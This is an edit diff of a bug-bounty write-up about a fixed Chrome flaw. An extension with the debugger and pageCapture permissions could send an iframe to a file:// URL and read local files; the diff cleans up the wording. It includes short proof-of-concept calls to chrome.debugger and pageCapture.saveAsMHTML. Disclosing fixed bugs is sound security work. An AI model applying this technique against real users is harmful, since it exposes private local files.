 Writeups

-The chrome extension chrome.debugger https://developer.chrome.com/docs/extensions/reference/api/debugger API implies <all_urls> permission but should not grant access to the users file system or bypass enterprise policies.
+The Chrome extension chrome.debugger https://developer.chrome.com/docs/extensions/reference/api/debugger API implies <all_urls> permission but should not grant access to the user’s file system or bypass enterprise policies.
+However, it’s a very powerful protocol by design with lots of features https://chromedevtools.github.io/devtools-protocol/

 ‘Page.navigate’ could navigate iframes to file:// when not enabled (Awarded $3000)

 Extensions with both pageCapture and debugger permissions could read local file contents.
-This is because its possible to use Page.navigate to navigate an iframe to file:// when “Allow access to file URLs” is disabled exposing the files contents to the pageCapture API.
+This is because it’s possible to use Page.navigate to navigate an iframe to file:// when “Allow access to file URLs” is disabled, exposing the file’s contents to the pageCapture API.

 chrome.debugger.attach({tabId: <TARGET>}, '1.3', console.log);

-chrome.debugger.sendCommand({tabId: <TARGET>}, 'Page.navigate', {frameId: <FRAME ID AS SEEN FROM EVENTS), url: 'file:///d:/demo.txt'}, console.log);
+chrome.debugger.sendCommand({tabId: <TARGET>}, 'Page.navigate', {frameId: <FRAME ID AS SEEN FROM EVENTS>, url: 'file:///d:/demo.txt'}, console.log);

-chrome.pageCapture.saveAsMHTML({tabId: 800972627}, console.log);
+chrome.pageCapture.saveAsMHTML({tabId: <TARGET>}, console.log);

 This issue was fixed in https://issues.chromium.org/40060173